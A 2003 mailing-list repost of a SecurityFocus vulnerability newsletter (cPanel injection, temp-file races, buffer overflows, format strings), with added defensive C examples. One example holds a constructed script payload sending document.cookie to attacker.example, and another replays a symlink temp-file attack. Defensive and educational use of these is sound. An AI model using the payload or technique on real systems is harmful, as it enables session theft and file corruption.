[gull-annonces] Summary of SecurityFocus Newsletter #205

Marc SCHAEFER schaefer at alphanet.ch
Tue Jul 15 20:11:01 CEST 2003


SEMI/WEMI Insecure Temporary File Creation Vulnerability
BugTraq ID: 8115
Remote: No
Date Published: Jul 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8115
Summary:

SEMI is a library used to add MIME features to Emacs. WEMI is a branch of
the SEMI package using widgets.

SEMI/WEMI have been reported prone to an insecure temporary file creation
vulnerability. As a result, it may be possible for local attackers to
corrupt files owned by the user who is invoking a version of Emacs that is
linked to the vulnerable library.

An attacker could potentially exploit this issue by creating a symbolic
link in place of the temporary file that is created by the affected
application. Any actions performed by the vulnerable application when it
is executed will be performed on the linked file.

It should be noted that the impact of this vulnerability may be
aggravated by the fact that attackers may potentially influence the content
that will be written to the target file.

X-Face-EL Insecure Temporary File Creation Vulnerability
BugTraq ID: 8116
Remote: No
Date Published: Jul 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8116
Summary:

x-face-el is a decoder for Emacs that decodes images that are included
inline in X-Face email headers.

x-face-el has been reported prone to an insecure temporary file creation
vulnerability. As a result, it may be possible for local attackers to
corrupt files owned by the user who is invoking Emacs and x-face-el.

An attacker could potentially exploit this issue by creating a symbolic
link in place of the temporary file that is created by the affected
application. Any actions performed by the vulnerable application when it
is executed will be performed on the linked file.

It should be noted that the impact of this vulnerability may be
aggravated by the fact that attackers may potentially influence the content
that will be written to the target file.

GKrellM Mailwatch Plugin From Header Remote Buffer Overflow Vulnerability
BugTraq ID: 8118
Remote: Yes
Date Published: Jul 06 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8118
Summary:

GKrellM is the GTK Monitors suite.  It is available for the Linux
platform.

It has been reported that the Mailwatch plugin for GKrellM is vulnerable
to a remotely exploitable buffer overflow.  This may permit the execution
of arbitrary code with the privileges of the GKrellM program.

The problem is in the handling of long strings contained in the From
header of e-mails.  By sending an e-mail with a From header that contains
558 or more characters as the e-mail user name to a user of GKrellM with
the Mailwatch plugin, it is possible to overwrite sensitive process
memory.  This vulnerability could be exploited to execute arbitrary
instructions on behalf of the attacker.

CPanel Admin Interface HTML Injection Vulnerability
BugTraq ID: 8119
Remote: Yes
Date Published: Jul 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8119
Summary:

cPanel is a multi-platform web hosting control panel that allows a user to
manage their hosted account through a web-based interface.  It is
available for Unix and Linux variants.

cPanel is prone to an HTML injection vulnerability.  It is possible for
remote attackers to include hostile HTML and script code in requests to
cPanel, which will be logged.  When logs are viewed by an administrative
user, the injected code could be rendered in their browser in the context
of the site hosting cPanel.  HTML may be injected into the 'Error Log' and
'Latest Visitors' pages.  This is due to insufficient sanitization of HTML
and script code when logging client requests.

Exploitation of this issue could permit theft of administrative
cookie-based authentication credentials.  The attacker will also be able
to exert control over how affected pages are rendered, which could permit
log spoofing or other attacks.

[ language undetermined, licence unclear ]
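The cPanel issue above is a stored HTML injection through the log viewer: anything a client can get written to the error log or visitor log is later placed into an HTML page that an administrator views. The fix is to escape client-supplied strings when the page is rendered. The following is an added example written for this summary in C; it is not cPanel code, and the table layout, the hostile request line and the IP address are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Escape the characters that change meaning inside HTML text or attribute
 * values. Returns the escaped length (without the NUL), or -1 when the
 * result would not fit in out; on success out is NUL-terminated. */
int html_escape(const char *in, char *out, size_t outsz) {
    size_t used = 0;
    if (outsz == 0) return -1;
    for (const char *p = in; *p != '\0'; p++) {
        char literal[2] = { *p, '\0' };
        const char *rep;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = literal;  break;
        }
        size_t rl = strlen(rep);
        if (used + rl >= outsz) return -1;      /* leave room for the NUL */
        memcpy(out + used, rep, rl);
        used += rl;
    }
    out[used] = '\0';
    return (int)used;
}

/* Build one table row of a "Latest Visitors" style viewer from a raw log
 * entry. Both cells pass through html_escape, so a request line such as
 * "GET /<script>..." is displayed literally instead of being executed in
 * the administrator's browser. Returns the row length or -1. */
int render_visitor_row(const char *client_ip, const char *request,
                       char *out, size_t outsz) {
    char ip_esc[128], req_esc[2048];
    if (html_escape(client_ip, ip_esc, sizeof ip_esc) < 0) return -1;
    if (html_escape(request, req_esc, sizeof req_esc) < 0) return -1;
    int n = snprintf(out, outsz, "<tr><td>%s</td><td>%s</td></tr>",
                     ip_esc, req_esc);
    if (n < 0 || (size_t)n >= outsz) return -1;
    return n;
}

/* Constructed sample: a request an attacker sends so that it is logged and
 * later rendered in the administrator's session. */
const char *sample_hostile_request =
    "GET /<script>document.location='http://attacker.example/?'"
    "+document.cookie</script> HTTP/1.0";

char demo_row[4096];

int main(void) {
    if (render_visitor_row("192.0.2.10", sample_hostile_request,
                           demo_row, sizeof demo_row) < 0)
        return 1;
    puts(demo_row);
    return 0;
}
```

The escaping is done at output time, not at logging time: the log should keep the raw request for forensic value, and the viewer is the only place that knows the string is going into HTML. The bounds check returns an error rather than truncating, since a truncated entity such as `&lt` would itself be a rendering problem.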

Canon GP300 Remote Malformed HTTP Get Denial Of Service Vulnerability
BugTraq ID: 8121
Remote: Yes
Date Published: Jul 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8121
Summary:

The GP-300 is a combined printer and photocopier with a built-in print
server.  It is distributed and maintained by Canon.

A problem in the Canon GP-300 has been reported in the handling of some
types of web requests.  This issue could result in the denial of service
to legitimate users of the print server.

The problem is in the handling of HTTP GET requests.  When a malformed
HTTP GET request is issued to the HTTP server deployed on GP-300 servers,
the system reportedly becomes unstable and crashes.  A reboot of the
system is required to resume normal operation of the print server.

This problem has been reported to occur when the server is used in
conjunction with WebSpooler v4.5.062.

[ hardware ]

Liece Insecure Temporary File Creation Vulnerability
BugTraq ID: 8124
Remote: No
Date Published: Jul 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8124
Summary:

Liece is an Internet Relay Chat client for Emacs.

It has been reported that liece does not create temporary files in a
secure manner. As a result of this, a malicious user may be able to
corrupt arbitrary files in the security context of the user running liece.
It may be possible for the attacker to specify the data to be written,
however, this has not been confirmed. If the attacker can cause custom
data to be written, it may be possible to elevate privileges.

Specific details are not currently available for this vulnerability. This
BID will be updated as more information becomes available.

Mozart Unsafe Mailcap Configuration Vulnerability
BugTraq ID: 8125
Remote: Yes
Date Published: Jul 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8125
Summary:

Mozart is a development platform that is based on the Oz language.

When Mozart is installed on the local system, an entry is added to the
mailcap configuration file. This file is used to provide information to
MIME-aware client applications regarding how to handle certain filetypes.
The Mozart package specifies that any Oz filetypes are to be passed to the
Oz interpreter for execution. As a result, any client browsing a web page
or reading an e-mail message may potentially be forced to execute
arbitrary Oz scripts.  This could result in execution of malicious code.

Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
BugTraq ID: 8134
Remote: Yes
Date Published: Jul 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8134
Summary:

Apache provides directives for supplying cipher suite specifications for
SSL transactions.  The cipher suite is negotiated with the client during
the SSL handshake.  These directives may be used in a per-directory or
per-server context.

The Apache Software Foundation has reported an issue that may occur when
the SSLCipherSuite directive is used to upgrade a cipher suite.
Particular sequences of per-directory renegotiations may cause a weaker
cipher suite being used in place of the upgraded one.

If this issue were to occur, flaws in weaker ciphersuites could be
exposed.  This could threaten the integrity of SSL transactions negotiated
between a vulnerable server and the client.  This could provide an
opportunity for passive attackers in a position to observe such a
transaction.

Further technical details are not available at the time of writing.  This
BID will be updated appropriately when additional technical information
becomes available.

Apache Web Server Prefork MPM Denial Of Service Vulnerability
BugTraq ID: 8137
Remote: Yes
Date Published: Jul 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8137
Summary:

Apache is a freely available web server. It is available for a variety of
platforms including the Unix, Linux and Microsoft Windows operating
systems.

Apache may be run as a non-threaded, pre-forking server via the prefork
MPM (Multi-Processing Module).

The Apache Software Foundation has reported a vulnerability in the prefork
MPM that could result in a temporary denial of service condition.  This
condition is known to occur when an accept() call on a rarely accessed
port returns certain errors.

Further technical details are not available at the time of writing.  This
BID will be updated appropriately when additional technical information
becomes available.

Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
BugTraq ID: 8138
Remote: No
Date Published: Jul 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8138
Summary:

Apache is a freely available web server. It is available for a variety of
platforms including the Unix, Linux and Microsoft Windows operating
systems.

Apache's content negotiation functionality has been reported prone to a
denial of service vulnerability.

The issue may present itself if an attacker has the ability to create a
malicious type-map file. The attacker may craft the type-map file in a
manner sufficient to cause the vulnerable server to fall into an infinite
loop. It has been reported that the Apache server will exponentially
consume resources in such circumstances, effectively denying service to
other legitimate system users.

Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
BugTraq ID: 8135
Remote: Yes
Date Published: Jul 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8135
Summary:

Apache is a freely available web server. It is available for a variety of
platforms including the Unix, Linux and Microsoft Windows operating
systems.

A denial of service vulnerability has been reported by the vendor to
affect the FTP proxy component of Apache. It has been reported that an
attacker may specify a target server that possesses an IPv6 address. This
may result in a denial of service to other legitimate users. The issue
reportedly presents itself because the proxy server fails to create an
IPv6 socket.

Explicit technical details regarding this vulnerability are not currently
known, this BID will be updated as further details are disclosed.

Knoppix QT Insecure Temporary File Creation Vulnerability
BugTraq ID: 8139
Remote: No
Date Published: Jul 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8139
Summary:

Knoppix is a freely available, open source Linux operating system.

A problem has been identified in Knoppix that may allow an attacker to
exploit the insecure creation of a temporary file.  This could result in a
denial of service attack, and potentially an elevation of privileges.

The problem is in the handling of temporary files when the QT libraries
are invoked.  KDE is installed by default with Knoppix, and when the
window manager invokes the QT libraries, the libraries create files with
the predictable names qt_plugins_3.0rc and qt_plugins_3.0rc.lock, both
with the privileges of the root user.

This problem may affect previous versions of the software.

ZKFingerD Multiple Format String Vulnerabilities
BugTraq ID: 8142
Remote: Yes
Date Published: Jul 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8142
Summary:

zkfingerd is a freely available, open source implementation of the finger
protocol (RFC 1288).  It is available for the Unix and Linux operating
systems.

A problem in zkfingerd may make it possible for a remote user to launch a
format string attack against the daemon.  This may result in an attacker
gaining unauthorized access to system resources.

The problem is in the 'die.c' source file.  Two instances of format string
vulnerabilities exist in the file that may allow an attacker to write to
arbitrary process memory and potentially execute code.  Any code executed
through this vulnerability could potentially be carried out with the
privileges of the zkfingerd process.
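A format string vulnerability arises when text received from the network is passed as the format argument of a printf-family or syslog call instead of as data. The following is an added example written for this summary in C; it is not zkfingerd's die.c. It shows the hardened form, where the message is always bound to a fixed "%s", together with a small scanner that counts conversion directives in untrusted input and flags "%n", which is a usable detection rule on finger requests or log lines. The "fatal: " prefix is an assumption.

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Vulnerable shape (shown, not called): the caller's text IS the format,
 * so every '%' directive in it is interpreted and "%n" writes to memory.
 *
 *     static void die_vulnerable(const char *msg) { syslog(LOG_ERR, msg); }
 */

/* Hardened form: the untrusted text is always an argument to a fixed
 * format. Returns the formatted length, or -1 if out is too small. */
int die_message(char *out, size_t outsz, const char *untrusted) {
    int n = snprintf(out, outsz, "fatal: %s", untrusted);
    if (n < 0 || (size_t)n >= outsz) return -1;
    return n;
}

void die_hardened(const char *untrusted) {
    syslog(LOG_ERR, "fatal: %s", untrusted);   /* never syslog(LOG_ERR, untrusted) */
}

/* Count printf-style conversion directives in untrusted text ("%%" is a
 * literal percent sign and does not count). Sets *has_n when a "%n"
 * directive, the one that writes to memory, is present. */
int count_format_directives(const char *s, int *has_n) {
    int count = 0;
    if (has_n != NULL) *has_n = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        count++;
        p++;
        /* skip flags, width, precision, positional and length modifiers */
        while (*p != '\0' && strchr("-+ #0123456789.$*hlLqjzt", *p) != NULL)
            p++;
        if (*p == '\0') break;
        if (has_n != NULL && *p == 'n') *has_n = 1;
    }
    return count;
}

int has_n_directive(const char *s) {
    int has_n;
    count_format_directives(s, &has_n);
    return has_n;
}

char demo_out[256];
```

The scanner is a detection aid, not a fix: any "%" in input that reaches a format argument is already a bug, and the only correct repair is the fixed-format call above. Compiling with -Wformat-security (gcc) reports calls whose format is a non-literal with no arguments, which is exactly the die(msg) shape.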

SKK/DDSKK Insecure Temporary Files Vulnerability
BugTraq ID: 8144
Remote: No
Date Published: Jul 09 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8144
Summary:

skk and ddskk are Kana to Kanji conversion programs for use with Emacs.
They are available for Unix and Linux variants.

skk and ddskk do not create temporary files in a secure manner.  This
could permit local attackers to mount file corruption attacks against
sensitive or critical files owned by other users.  This would occur in the
context of the user invoking the vulnerable utility.  If files can be
corrupted with custom data, this may allow for privilege escalation
attacks.  Otherwise, it may be possible to cause a denial of service by
overwriting critical files.
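The SEMI/WEMI, x-face-el, liece, Knoppix QT and skk/ddskk entries above describe one bug: a temporary file with a predictable name is opened without O_EXCL, so a symlink planted at that name by another local user redirects the write to a file the victim owns. The following is an added example written for this summary in C; it is not code from any of those packages, and the scratch directory, the "victim" file and the predictable name emacs-tmp.12345 are constructed for the demonstration. It replays the attack against an open() without O_EXCL and then against one with it.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE 1          /* mkdtemp(), symlink() under strict -std on glibc */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Vulnerable pattern: a fixed, predictable name opened without O_EXCL.
 * open() follows whatever symlink already sits at 'path'. */
int open_temp_insecure(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened pattern: O_EXCL makes open() fail with EEXIST when anything,
 * including a dangling symlink, already exists at 'path'. */
int open_temp_secure(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

static int write_all(int fd, const char *s) {
    size_t len = strlen(s);
    return write(fd, s, len) == (ssize_t)len ? 0 : -1;
}

static int read_text(const char *path, char *buf, size_t n) {
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    ssize_t got = read(fd, buf, n - 1);
    close(fd);
    if (got < 0) return -1;
    buf[got] = '\0';
    return 0;
}

/* Replay the attack in a private scratch directory: "victim" stands in for
 * a file the Emacs user owns, the symlink is what the local attacker plants
 * at the predictable temporary name before the program runs. Returns 1 if
 * the program's write reached the victim, 0 if it was blocked, -1 if the
 * scratch directory could not be set up. */
int symlink_attack_succeeds(int use_secure_open) {
    const char *base = getenv("TMPDIR");
    if (base == NULL || *base == '\0') base = "/tmp";
    char dir[1024], victim[1100], tmp[1100], contents[64];
    snprintf(dir, sizeof dir, "%s/tmpdemo-XXXXXX", base);
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(tmp, sizeof tmp, "%s/emacs-tmp.12345", dir);   /* predictable name */
    int rc = -1;
    int fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) goto cleanup;
    if (write_all(fd, "original contents\n") != 0) { close(fd); goto cleanup; }
    close(fd);
    if (symlink(victim, tmp) != 0) goto cleanup;          /* attacker's move */
    fd = use_secure_open ? open_temp_secure(tmp) : open_temp_insecure(tmp);
    if (fd >= 0) {                                        /* program's move */
        (void)write_all(fd, "attacker-chosen data\n");
        close(fd);
    }
    if (read_text(victim, contents, sizeof contents) != 0) goto cleanup;
    rc = strcmp(contents, "original contents\n") != 0;
cleanup:
    unlink(tmp);
    unlink(victim);
    rmdir(dir);
    return rc;
}

int main(void) {
    printf("without O_EXCL: victim clobbered = %d\n", symlink_attack_succeeds(0));
    printf("with O_EXCL:    victim clobbered = %d\n", symlink_attack_succeeds(1));
    return 0;
}
```

O_EXCL alone still leaves a denial of service: an attacker who pre-creates an ordinary file at the predictable name makes every run fail. mkstemp() (random name plus O_EXCL) inside a directory created by mkdtemp() removes the predictability as well. Emacs Lisp has the same split: make-temp-name only returns a name, while make-temp-file actually creates the file.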

Teapop SQL Injection Vulnerability
BugTraq ID: 8146
Remote: Yes
Date Published: Jul 09 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8146
Summary:

teapop is a POP3 server implementation for Unix and Linux variants.

teapop is prone to an SQL injection vulnerability.  This issue occurs in
modules supplied with Teapop that allow authentication via a MySQL or
PostgreSQL database.  These modules do not sufficiently sanitize
user-supplied input before it is included in database queries.
Exploitation could allow for SQL queries to be modified, potentially
allowing for unauthorized access, information disclosure or other
consequences.  This would occur in the context of the teapop database
user.

TerminatorX Home Environment Variable Buffer Overflow Vulnerability
BugTraq ID: 8147
Remote: No
Date Published: Jul 09 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8147
Summary:

terminatorX is a freely available, open source music manipulation program.
It is available for the Linux platform.

A problem has been reported in terminatorX when processing the HOME
environment variable.  Because of this, an attacker may be able to gain
elevated privileges.

The problem is in the handling of long strings.  When a large amount of
data is placed in the HOME environment variable, a boundary condition
error occurs that could result in the overwriting of sensitive process
memory.  Because the vendor recommends installing this program setuid
root, it may be possible for a local user to execute code with the
privileges of the root user.

It should be noted that, by default, terminatorX is not installed setuid.

TerminatorX XLocaleDIR Environment Variable Buffer Overflow Vulnerability
BugTraq ID: 8148
Remote: No
Date Published: Jul 09 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8148
Summary:

terminatorX is a freely available, open source music manipulation program.
It is available for the Linux platform.

A problem has been reported in terminatorX when processing the XLOCALEDIR
environment variable. Because of this, an attacker may be able to gain
elevated privileges.

The problem is in the handling of long strings. When a large amount of
data is placed in the XLOCALEDIR environment variable, a boundary
condition error occurs that could result in the overwriting of sensitive
process memory. Because the vendor recommends installing this program
setuid root, it may be possible for a local user to execute code with the
privileges of the root user.

It should be noted that, by default, terminatorX is not installed setuid.
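Both terminatorX entries, and the GKrellM Mailwatch overflow earlier in this summary, are one bug class: a fixed-size buffer filled by a copy whose length the attacker controls, whether that is an environment variable or the user-name part of a From header. The following is an added example written for this summary in C; it is not terminatorX or GKrellM code, and the rcfile name, the 64-byte name limit and the sample addresses are assumptions. It shows the bounded version of both copies and the extra check a setuid program needs: when real and effective UID differ, HOME is attacker-supplied and should not be consulted at all.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Vulnerable shape (shown, not called): the copy length is whatever the
 * sender or the environment supplied, while the buffer is fixed.
 *
 *     char user[64];
 *     const char *at = strchr(from, '@');
 *     memcpy(user, from, at - from);        // 558 bytes into 64
 *
 *     char rc[256];
 *     sprintf(rc, "%s/rcfile", getenv("HOME"));
 */

/* Copy the user-name part of a From header value (text before '@') into
 * out. Returns its length, or -1 when it would not fit; callers must
 * treat -1 as a malformed message rather than silently truncating. */
int from_local_part(const char *from, char *out, size_t outsz) {
    const char *at = strchr(from, '@');
    size_t len = at != NULL ? (size_t)(at - from) : strlen(from);
    if (outsz == 0 || len >= outsz) return -1;
    memcpy(out, from, len);
    out[len] = '\0';
    return (int)len;
}

/* Build "<home>/<rcname>" with a length check instead of sprintf().
 * Returns the path length, or -1 on an unusable or oversize HOME. */
int rc_path_from_home(const char *home, const char *rcname,
                      char *out, size_t outsz) {
    if (home == NULL || home[0] != '/') return -1;
    int n = snprintf(out, outsz, "%s/%s", home, rcname);
    if (n < 0 || (size_t)n >= outsz) return -1;   /* would have been truncated */
    return n;
}

/* In a setuid binary every environment variable is attacker-controlled.
 * Use HOME only when no privilege boundary is crossed; otherwise the
 * caller should fall back to getpwuid(getuid())->pw_dir. */
const char *trusted_home(void) {
    if (getuid() != geteuid()) return NULL;
    return getenv("HOME");
}

/* Constructed input: a From header whose user name is n bytes long. */
const char *constructed_from_header(size_t n) {
    static char buf[4096];
    if (n > sizeof buf - 16) n = sizeof buf - 16;
    memset(buf, 'A', n);
    strcpy(buf + n, "@example.org");
    return buf;
}

char demo_name[64];
char demo_path[32];
```

The two checks differ in what they do on oversize input: the header parser rejects the message, the path builder rejects the environment. Neither truncates, because a silently shortened path or name is itself a source of later confusion (a different file than intended gets opened).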

NetScreen Non-IP Traffic Firewall Bypass Vulnerability
BugTraq ID: 8150
Remote: Yes
Date Published: Jul 09 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8150
Summary:

NetScreen is a line of Internet security appliances integrating firewall,
VPN and traffic management features. ScreenOS is the software used to
manage and configure the firewall. NetScreen supports Microsoft Windows
95, 98, ME, NT and 2000 clients.

It has been alleged that it is possible for remote users to bypass
NetScreen firewalls.  Reports have stated that any non-IP or ARP traffic
will bypass the firewall without being logged.  Various protocols, such as
SNA, IPX CDP, CDP, and VST may pass through the firewall unnoticed and
without being filtered.  This could permit an attacker to interact with
hosts behind the firewall that support these various protocols.

This is reported to occur in 20x and 50x models when run in bridge mode,
though this is not conclusive.  This alleged vulnerability has not been
confirmed by Symantec.

[ hardware ]

Cisco Catalyst Non-Standard TCP Flags Remote Denial Of Service Vulnerability
BugTraq ID: 8149
Remote: Yes
Date Published: Jul 09 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8149
Summary:

Catalyst is a network switch hardware and firmware combination maintained
and distributed by Cisco Systems.

A problem with Cisco Catalyst switches has been reported in the handling
of non-standard TCP packets.  Because of this, an attacker may be able to
deny legitimate users access to the switch.

The problem is in the handling of TCP packets which have non-standard TCP
flags.  Though specific details about this problem are not available, this
likely includes a mixed combination of TCP SYN, FIN, ACK, RST, and URG
flags that do not commonly occur in networks.

When eight of these packets are received by a specific service on the
Catalyst, the service ceases normal operation.  To resume normal operation
of these services, the switch requires a reboot.

It should be noted that this vulnerability only affects the services
operating on the switch, and does not affect the switch's ability to
forward traffic.  This problem affects 4000, 5000, and 6000 series
switches.

[ hardware ]
